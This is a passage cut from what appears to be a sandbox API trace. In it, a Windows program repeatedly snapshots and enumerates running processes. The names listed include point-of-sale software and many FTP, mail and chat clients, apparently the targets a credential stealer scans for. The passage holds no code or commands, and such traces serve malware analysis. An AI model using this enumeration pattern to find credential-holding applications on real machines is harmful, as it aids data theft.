cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0255.059] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0255.063] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0255.065] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0255.066] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0255.068] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0255.069] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0255.071] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0255.073] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.079] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.081] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.086] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0255.087] CloseHandle (hObject=0x758) returned 1 [0255.087] Sleep (dwMilliseconds=0x64) [0255.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0255.260] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.262] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.264] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.265] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.267] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.268] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.270] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.271] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.272] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.274] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.275] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.277] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.278] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.280] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.281] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.283] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.284] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.285] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.287] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.288] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.290] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0255.291] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0255.340] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.342] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.343] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0255.345] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0255.346] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0255.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.349] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.351] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0255.352] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.354] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.355] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0255.357] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0255.358] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0255.360] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0255.361] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0255.363] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0255.364] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0255.366] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0255.367] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0255.368] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0255.370] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0255.371] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0255.373] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0255.374] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0255.376] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0255.377] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0255.378] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0255.380] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0255.381] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0255.383] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0255.384] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0255.386] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0255.387] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0255.424] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0255.426] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0255.428] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0255.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0255.433] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0255.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0255.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0255.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0255.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0255.447] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0255.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0255.453] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0255.455] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0255.456] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0255.458] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | 